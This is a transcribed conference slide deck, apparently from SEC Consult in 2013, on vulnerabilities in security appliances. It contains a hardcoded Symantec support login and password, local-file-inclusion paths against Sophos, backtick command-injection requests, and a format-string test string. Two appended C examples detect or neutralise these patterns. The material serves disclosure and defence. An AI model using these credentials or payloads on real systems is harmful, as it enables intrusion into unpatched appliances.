Alexander Antukh
- 2. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
- 3.
SEC Consult – Who we are
[Map legend: SEC Consult Office, SEC Consult Headquarters, Other SEC Consult Clients; locations marked: Canada, India, Singapore, Lithuania, Germany, Austria, Central and Eastern Europe, USA]
• Leading international application security consultancy
• Founded 2002
• Headquarters near Vienna, Austria
• Delivery Centers in Austria, Germany, Lithuania and Singapore
• Strong customer base in Central and Eastern Europe
• Increasing customer base of clients with global business (esp. out of Top-10 US and European software vendors)
• 35+ application security experts
• Industry focus: banks, software vendors, government
- 4.
Alexander Antukh – Whoami
• Security consultant
• Offensive Security Certified Expert
• Defcon Moscow Local Group Coordinator
*kidhacker
- 5.
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
- 6.
What is Security Software
“A generic term referring to any computer program or library whose purpose is to (help to) secure a computer system or a computer network”
- 7.
What is Security Software
The keyword in all the security software is…
- 8.
What is Security Software
- 9.
What is Security Software
In other words, SS is a piece of “anti-evil” software which makes you feel safe and “anti-bad”.
- 10.
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
- 11.
Historical review
Firewall
Evolution: Packet filter → Stateful FW → App layer FW
First appearance: 1988
First *registered* exploit: 1995
Objective: control network traffic and determine if it’s good enough to pass
- 12.
Historical review
ID(P)S
Ceci n’est pas un firewall... (This is not a firewall...)
First appearance: 1986
First *registered* hack: 1999
Objective: monitor for malicious activities or policy violations (heuristics, signatures...)
Detection approaches: Statistical anomaly-based, Signature-based
Response: Passive (detection), Reactive (prevention)
- 13.
Historical review
AntiSpam evolution: Del → Keywords → Blacklists → Auth → Protocol analysis → Filtering
First appearance: Monty Python
First PoC: 1978
Industrial scale: 1994 - ...
CAN-SPAM Act of 2003: spam is legal
- 14.
Historical review
Anti-sniffing
First registered hack: 1903 (OSVDB-ID: 79399, 79400)
Nevil Maskelyne
“… I did it for the lulz”
Today it’s network configuration, encryption and IDS/IPS
- 15.
Historical review
Anti-virus
First “viruses”: 1971
First viruses: mid-1980s
First AVs: mid-1980s (CHK4BOMB, BOMBSQUAD, DRPROTECT)
Virus evolution: Benign → Destructive → $$$$$
- 16.
Historical review
AV companies don’t stand still…
- 17.
Historical review
… neither do other SS products
- 18.
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
- 19.
The question
Do you know anybody less boring?
What if the SS is vulnerable itself?
- 20.
The answer
*sorry for my English
- 21.
Déjà vu (slide from PHDays 2012)
• Reverse engineering
  • Checkpoint – Client side remote command execution (multiple Checkpoint appliances, CVE-2011-1827)
• Fuzzing
  • F5 FirePass SSL VPN – Remote command execution (CVE-2012-1777)
• Application testing
  • Microsoft ASP.NET – Authentication bypass (Microsoft Security Bulletin MS11-100 - Critical: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2638420), CVE-2011-3416)
Security software products will be the target of the trade ... soon!
- 22.
The time has come!
- 23.
The answer
• Symantec Messaging Gateway
  • Backdoor by design → code execution
• F5 BIG-IP
  • SQL Injection, XXE → passwords… root access
• Applicure dotDefender WAF
  • Format string vulnerability → code execution
• Sophos Web Protection Appliance
  • LFI, OS Command Injection → command execution, admin account pwn
Security software products are the target of the trade ... already!
- 24.
The answer
Symantec Messaging Gateway v.9.5.x
“... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
- 25.
The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“
- 26.
The answer
F5 BIG-IP <= 11.2.0
sam/admin/reports/php/getSettings.php
- 27.
The answer
AppliCure dotDefender WAF <= 4.26
“... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...“
Web Attack?
- 28.
The answer
AppliCure dotDefender WAF <= 4.26
Error page can be configured in different ways:
Vars to be added to the body of a custom page:
• %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field
• %RID% - reference ID
• %IP% - server's IP address
• %DATE_TIME% - date of blocked request
Looks nice…
- 29.
The answer
Format string injection
Data flow: Variables → Buffer → ... → AP_PRINTF()
Algorithm: check for format string vulnerabilities
… should be <%IP%> Host: …
%666dxBAxADxBExEF…
AppliCure dotDefender WAF <= 4.26
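The rendering side of the dotDefender block page described on these slides, as an added example that is neither dotDefender's nor the talk's code: %IP%-style placeholders are expanded by copying, so the expanded template never becomes the format argument of a printf-style sink such as AP_PRINTF(), and a separate check flags any % in an admin-supplied template that does not open a known placeholder (the %666d… test string above is caught). The placeholder table and sample values are assumptions.

```c
#include <string.h>
/* Placeholders from the dotDefender custom block page (slide 28) with constructed
 * sample values; none of this is the product's code. */
struct var { const char *name; const char *value; };
static const struct var VARS[] = {
    { "MAILTO_BLOCK", "admin@example.com" }, { "RID", "42" },
    { "IP", "10.0.0.1" }, { "DATE_TIME", "2013-05-23 10:00:00" },
};
#define NVARS (sizeof VARS / sizeof VARS[0])
/* Index of the %NAME% placeholder opening at p, or NVARS if there is none. */
static size_t match_var(const char *p) {
    size_t i, n;
    for (i = 0; i < NVARS; i++) {
        n = strlen(VARS[i].name);
        if (strncmp(p + 1, VARS[i].name, n) == 0 && p[1 + n] == '%') break;
    }
    return i;
}
/* Expand placeholders by copying into a static buffer: the template is data, so a
 * "%666d" in it is reproduced verbatim instead of being read as a conversion. The
 * result may reach a printf-style sink only as the argument of a "%s" format. */
const char *render_block_page(const char *tmpl) {
    static char out[512];
    size_t o = 0, i, vl;
    for (const char *p = tmpl; *p && o + 1 < sizeof out; ) {
        if (*p == '%' && (i = match_var(p)) < NVARS) {
            vl = strlen(VARS[i].value);
            if (vl > sizeof out - 1 - o) vl = sizeof out - 1 - o;
            memcpy(out + o, VARS[i].value, vl); o += vl;
            p += strlen(VARS[i].name) + 2;            /* skip %NAME% */
        } else {
            out[o++] = *p++;
        }
    }
    out[o] = '\0';
    return out;
}

/* 1 if some '%' in the template opens no known placeholder, i.e. a printf-style sink
 * such as AP_PRINTF() would treat it as a directive (conservative: flags "%%" too). */
int template_has_stray_percent(const char *tmpl) {
    for (const char *p = tmpl; *p; p++) {
        if (*p != '%') continue;
        size_t i = match_var(p);
        if (i == NVARS) return 1;
        p += strlen(VARS[i].name) + 1;                /* lands on closing '%' */
    }
    return 0;
}
```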
- 30.
The answer
Sophos Web Protection Appliance <= 3.7.8.1
“... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“
LFI: https://<host>/cgi-bin/patience.cgi?id=..
?id=../../persist/config/shared.conf%00
?id=../../log/ui_access_log%00
Log line with a session id in the STYLE parameter:
"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
Passwords!
- 31.
The answer
Sophos Web Protection Appliance <= 3.7.8.1
Diagnostic Tools:
POST /index.php?c=diagnostic_tools HTTP/1.1
...
action=wget&section=configuration&STYLE=<validsessid>&url=%60sleep%205%60
- 32.
The answer
Sophos Web Protection Appliance <= 3.7.8.1
Block page (%%user_workstation%%):
https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60
- 33.
The answer
Sophos Web Protection Appliance <= 3.7.8.1
Local Site List:
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
- 34.
The answer
Sophos Web Protection
Appliance <= 3.7.8.1
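Detection logic for the three Sophos vectors shown on the preceding slides (directory traversal with a %00 terminator in patience.cgi, and backtick command substitution in the diagnostic tools, block page and local site list parameters), as an added example that is neither Sophos nor SEC Consult code: it classifies request lines and runs over constructed log lines modelled on the slides.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

enum { REQ_TRAVERSAL = 1, REQ_NULLBYTE = 2, REQ_CMDSUBST = 4 };

/* Case-insensitive substring search so that %2F and %2f match alike. */
static int has_ci(const char *hay, const char *needle) {
    size_t n = strlen(needle), i;
    for (; *hay; hay++) {
        for (i = 0; i < n && hay[i] &&
             tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]); i++) ;
        if (i == n) return 1;
    }
    return 0;
}

/* Flag the patterns behind the Sophos findings in one request line: parent-directory
 * traversal, a URL-encoded NUL used to cut off a path suffix, and shell command
 * substitution (backtick or $( ), raw or URL-encoded). */
int classify_request(const char *req) {
    int f = 0;
    if (has_ci(req, "../") || has_ci(req, "..%2f") || has_ci(req, "..%5c")) f |= REQ_TRAVERSAL;
    if (has_ci(req, "%00")) f |= REQ_NULLBYTE;
    if (strchr(req, '`') || has_ci(req, "%60") || strstr(req, "$(") || has_ci(req, "%24%28"))
        f |= REQ_CMDSUBST;
    return f;
}

/* Constructed request lines modelled on the slides; not taken from a real appliance log. */
static const char *SAMPLE_LOG[] = {
    "GET /cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 HTTP/1.1",
    "POST /index.php?c=diagnostic_tools action=wget&section=configuration&url=%60sleep%205%60",
    "GET /end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 HTTP/1.1",
    "GET /index.php?section=configuration&c=configuration HTTP/1.1",
};
#define SAMPLE_LOG_N (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

/* Number of lines carrying at least one flag. */
size_t count_flagged(const char **lines, size_t n) {
    size_t c = 0;
    for (size_t i = 0; i < n; i++) if (classify_request(lines[i])) c++;
    return c;
}
```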
- 35.
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
- 36.
Vuln, where art thou?
• Methods for identifying usable bugs in “Software products”
  • Application testing and Fuzzing
  • Reverse engineering
  • Source code analysis
• A short note on so-called “security scanning” tools
- 37.
Vuln, where art thou?
• The workflow for the appliance analysis is pretty simple!
  • get a virtual appliance demo version
  • install the appliance
  • add the .vmdk to another VM and mount it there (or use a Linux fs driver that can mount vmdk files)
  • add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config)
  • start the appliance again and log in :)
  • look at the services that are running (and their configuration)
  • pwnage ;)
- 38.
Vuln, where art thou?
*Move two matches to make it three equal squares
- 39.
Start me up!
Vuln, where art thou?
- 40.
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
- 41.
Sometimes it’s easier to find the vulnerability than might be expected . . .
*doesn’t exist yet
And now for something completely different
- 42.
QA